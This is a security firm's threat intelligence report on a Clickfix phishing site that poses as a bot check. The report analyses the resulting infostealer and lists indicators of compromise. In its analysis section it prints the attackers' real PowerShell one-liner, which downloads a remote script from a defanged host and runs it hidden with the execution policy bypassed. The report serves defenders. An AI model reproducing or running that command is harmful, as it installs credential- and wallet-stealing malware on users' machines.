Threat Intelligence: Clickfix Phishing Attack
Authors: Joker & Thinking
Editors: KrsMt. & Liz
Background
Recently, the MistEye security monitoring system detected a phishing website leveraging the Clickfix phishing attack technique. Such phishing sites typically imitate common bot verification features used by legitimate websites to trick victims into executing malicious commands, leading to the download of malware.
Once relevant malicious samples were obtained, the SlowMist security team immediately initiated an in-depth analysis.
Analysis
When accessing the phishing site, users are presented with what appears to be a legitimate bot verification checkbox.
When victims click the checkbox to start the verification, the phishing site silently copies a malicious command into their clipboard. Victims are then prompted to press specific keys, which triggers the download and execution of the malware.
The frontend code shows that the program listens for postMessage events from iframes or parent/child windows. Once it receives the message turnstileSuccess, it calls the function copyTextSilently().
In index_1.html, the code monitors the checkbox. Once the victim interacts with it, the page sends a turnstileSuccess message to the parent page.
Clipboard Injection of Malicious Commands
In the copyTextSilently() function:
- If the Clipboard API conditions are met, it directly calls
Clipboard#writeText()to copy the malicious command. - Otherwise, it creates a hidden
<textarea>element, inserts the command, usesexecCommand()to copy it, and finally removes the element.
The code references command_win from the global window object, which is defined in the external script assets/command.js.
Within command.js, window.command_win is defined to download a malicious script from a remote server and execute it stealthily via PowerShell:
powershell -w h -c "
$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';
$p='$env:USERPROFILE\Music\d.ps1';
(New-Object System.Net.WebClient).DownloadFile($u,$p);
powershell -w h -ep bypass -f $p"Clicking the VERIFY button also triggers copyTextSilently(). However, due to browser security restrictions, victims must click again on the page after pressing VERIFY for the malicious command to be copied successfully.
Analysis of the Malicious Script
The malicious PowerShell script processes an array $mmASoSdDL by joining it into a string, decoding it from Base64, and converting it into a JSON object.
Hidden Directory Creation
The script checks if a target directory exists. If not, it creates one and sets its attributes to Hidden and System.
Writing Malicious Files
The script iterates over the files array in the JSON, constructs full paths, decodes Base64-encoded binary data, and writes them into the hidden directory.
Persistence via Auto-Startup
A shortcut named trntl.lnk is created in the victim’s Startup folder, pointing to trntl.exe. The shortcut uses a system icon for disguise, ensuring the malware executes automatically at login or startup.
Delayed Execution
The script generates a temporary .cmd file with a random name, which uses rundll32 to launch the .exe. After a 60-second delay, the script executes it via cmd.exe /c, and deletes the .cmd file afterward to erase traces.
Malicious Script Code
Below are the main portions of the malicious script (the original code was a single continuous block; line breaks have been added for readability).
Dynamic Analysis
The malicious executable was uploaded to VirusTotal, where it was flagged as malware.
Process Injection
The malware injects code into a legitimate process (regasm.exe), modifying its execution flow so that the benign process runs malicious payloads.
Sensitive Data Collection
Sandbox analysis indicates the malware exhibits typical info-stealing behavior, including:
- Extracting sensitive data from browsers (Chrome, Chromium, Opera, etc.), such as cookies, saved passwords, and crypto wallets.
- Targeting email clients (Thunderbird, Windows Mail) to steal accounts and messages.
- Locating crypto wallet files to steal private keys or wallet data.
- Extracting FTP credentials.
Keylogging
The malware includes a keylogger to capture keystrokes in real time, including usernames and passwords.
C2 Communication
The malware retrieves its C2 configuration from Pastebin and establishes communication with the malicious IP 217[.]12[.]204[.]47:9000/443. This allows exfiltration of stolen data and reception of commands.
- Malicious Pastebin URL:
https[:]//pastebin[.]com/raw/rzARed3W
- IP & URL already flagged as malicious on VirusTotal, with IP geolocated to Greece.
Conclusion
This phishing attack leverages social engineering techniques — tricking users into executing malicious commands, ultimately leading to malware installation. Victims who unknowingly run these commands risk theft of sensitive data, including crypto wallet private keys.
The SlowMist security team urges developers and users to remain vigilant when encountering unfamiliar commands. If debugging or command execution is necessary, it should only be performed in isolated environments without sensitive data.
IoCs
IPs
- 217[.]12[.]204[.]47
SHA256
- 4361fc3a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550 — aTu.lim
- cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039 — trntl.exe
- 60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4 — command.js
URLs
- https[:]//pastebin[.]com:443/raw/rzARed3W
- 217[.]12[.]204[.]47:443
- 217[.]12[.]204[.]47:9000
- http[:]//217[.]12[.]204[.]47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
- http[:]//electri[.]billregulator[.]com/aTu.lim
About SlowMist
SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.
